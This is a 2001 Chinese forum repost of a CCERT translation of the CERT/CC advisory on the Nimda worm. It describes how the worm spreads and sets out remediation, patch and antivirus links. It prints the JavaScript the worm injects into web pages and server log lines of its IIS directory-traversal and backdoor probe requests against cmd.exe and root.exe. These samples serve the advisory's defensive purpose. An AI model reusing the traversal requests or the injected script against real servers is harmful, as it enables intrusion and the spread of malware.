computer 版 (精华区)

发信人: Gordon (花开直落他人家), 信区: network
标  题: Nimda 网络蠕虫病毒
发信站: 听涛站 (2001年09月19日21:47:58 星期三), 站内信件

2001/9/18 CCERT/CC 发布此病毒公告,转载如下.
影响的系统:Windows95, 98,ME,NT 和2000;
感染方式:
CERT/CC 收到新的恶意病毒代码报告, 该病毒被称为 "W32/Nimda Worm" 或 "Concept
Virus (CV) v.5". 它可以通过多种方式传播:
通过电子邮件从一个客户端感染另一个客户端
通过开放的网络从一个客户端感染另一个客户端
通过浏览不安全的网站从Web 服务器感染客户端
通过主动扫描或利用 "Microsoft IIS 4.0 / 5.0 directory traversal" 的缺陷" 从客
户端感染Web 服务器
通过扫描 "Code Red" (IN-2001-09),和 "sadmind/IIS" (CA-2001-11) 留下的后门从客
户端感染Web 服务器
初步分析表明, 该病毒除了改变网页的目录以繁衍自身外没有其它破坏性的行为。但通
过大量的发送电子邮件和扫描网络可以导致"拒绝服务"（DoS）.
I. 病毒分析
该病毒影响运行Windows95, 98,ME,NT 和2000的客户端和服务器。
通过Email 传播
携带该病毒的邮件的包含两部分：第一部分定义成MIME 的 "text/html"格式，但实际上
没有任何文本，所以邮件内容是空的；第二部分定义成MIME 的 "audio/x-wav"格式，但
实际上附带了一个base64编码的可执行二进制文件，名称为"readme.exe"。
由于一个已知的安全漏洞 (Automatic Execution of Embedded MIME Types), 任何运行
在x86平台上的Email软件，如果使用Microsoft Internet Explorer 5.5 SP1或更早的版
本 （除了IE 5.01 SP2）去读取HTML格式的邮件，就会自动运行邮件附件。因此，在存
在安全漏洞配置下的机器上，打开或预览携带病毒的邮件就可以很容易的感染该病毒。
当然，运行附带的二进制文件也会感染该病毒。
携带Nimda 病毒的邮件具有一下特征：
邮件的主题各有不同，但到目前为止发现的携带病毒邮件的主题长度都大于80字（词）
;
比较不同的附件文件的CRC值，各附带的二进制文件都有轻微不同，但附带的文件的长度
似乎是总是一致的，都是57344字节。
危 害
感染Nimda 病毒的机器会不断向Windows 的地址薄中的所有的邮件发送携带了Nimda病毒
的邮件的拷贝。
同样的，客户端机器会扫描有漏洞的IIS 服务器。Nimda 会搜寻以前的IIS蠕虫病毒留下
的后门：Code Red II [IN-2001-09] 和 sadmind/IIS worm [CA-2001-11]； 它也试图
利用IIS Directory Traversal 漏洞 (VU #111677)。Nimda大致按以下比例选取感染目
标IP地址：
50%的可能，目标IP的前两个字节于本机的相同；
25％的可能，目标IP的前一个字节于本机的相同；
25％的可能，随机选取。
被感染的机器会发送一份Nimda病毒代码复本到任何在扫描中发现有漏洞的服务器。一旦
在该服务器上运行，蠕虫就会遍布系统里的每一个目录（甚至包括所有通过共享文件可
以读取得目录），然后会在磁盘里留下一份自身拷贝，取名为"README.EML"。一旦找到
了含有web内容的目录（包含html或asp文件），下面Javascript代码段就会被添加到每
一个跟web有关的文件中：
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000") </script>

这段代码使得蠕虫可以进一步繁衍，通过浏览器或浏览网络文件感染到新的客户端。
通过浏览器传播
作为感染过程的一部分，Nimda 更改所有的含有web内容的文件（象 .htm, ,html, .as
p 等文件）。这样，任何用户浏览该文件，不管是通过浏览器还是网络，就可能会下载
一份该病毒。有些浏览器会自动的执行下载动作，感染正在浏览该网站的机器。
通过文件系统感染
Nimda病毒生成大量的自身的复本，取名为README.EML, 写到该用户有可写权限的目录里
。如果在另一台机器的用户通过网络共享选取病毒文件，并且设置了预览功能的话，蠕
虫就会威胁到这台新的机器。
系统记录
对任何开放80/tcp断口的web服务器，Nimda蠕虫的扫描会生成下面的日志：
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c.. /win
nt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
注：这个例子的前四行表明在试图连接Red Code II 留下的后门，例子的其余部分在试
图利用Directory Traversal 漏洞。
II. 影响
在使用没有打补丁的IIS机器上，入侵者可以在本地系统安全的权限下运行任意命令。被
感染的机器具有相当高的风险去攻击其它Internet 站点。
网络上的机器感染病毒增多后，Nimda 蠕虫的高扫描速率可能导致带宽耗尽而拒绝服务
（DoS）.
III. 解决方案
对IIS系统管理员的建议：
1. 检查系统是否被感染，查找以下内容：
root.exe (表明系统受到过Code Red II或sadmind/IIS的损害，易于受到Nimdaa蠕虫的
攻击)
在包含网络内容的目录下的admin.dll或异常.eml文件（表明易于受到Nimdaa蠕虫的攻击
）
要从损害中恢复系统，只有从安全的来源重装系统和系统软件（供应商提供的光盘）。
重装后还应安装全部安全补丁。这个过程中系统应与网络断开连接。如果所有网络服务
关闭的话，也可以从网络下载补丁。 具体的恢复细节可以参考CERT/CC网站，Steps fo
r Recovering from a UNIX or NT System Compromise 连接。
2. 从提供商处获取补丁
对所有与IIS相关的漏洞，可以从下面站点下载补丁：
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
对用户的建议
1．从提供商处获取补丁
对使用有漏洞的IE的用户，建议从下面下载针对Automatic Execution of Embedded MI
ME Types漏洞的补丁：
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
2．运行和维护防病毒产品
升级反病毒软件是重要的，多数反病毒软件供应商已经提供病毒库或相关信息和工具，
从而提供对系统的保护并能部分恢复系统。如果反病毒软件包能够自动升级，建议使用
自动升级。
3．不要打开e-mail附件
Nimda 蠕虫可以作为email的readme.exe附件，不能打开这种附件。
4．关闭JavaScript，Nimda
蠕虫可以利用网页浏览感染端用户的系统，这种感染方式利用JavaScript传播，因此建
议关闭JavaScript。
IV. 杀毒工具
下列防病毒软件供应商已经提供了解决方案。请及时下载更新杀毒软件。
Central Command, Inc.
http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.ph
p?p_refno=010918-000005
Command Software Systems
http://www.commandsoftware.com/virus/nimda.html
Data Fellows Corp
http://www.datafellows.com/v-descs/nimda.shtml
McAfee
http://vil.mcafee.com/dispVirus.asp?virus_k=99209&
Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Symantec
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
Trend Micro
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TRO
J_NIMDA.A
V.快速的暂时解决办法
户在访问已感染Nimda蠕虫病毒的Web服务器时将被迅速的下载一个.eml（Outlook Expr
ess）的电子邮件文件，同时也将感染Nimda蠕虫病毒。
临时解决办法：禁用在Internet选项中的安全区域的"文件下载"的选项。
用户在使用Outlook Express收电子邮件时，不管你是否打开带毒邮件的附件只要阅读或
预览了该邮件都将受到感染。
临时解决办法：暂时停止使用Outlook Express收电子邮件。
(2001/9/19 CCERT 翻译整理） 
--
※ 来源:·听涛站 tingtao.dhs.org·[FROM: 匿名天使的家]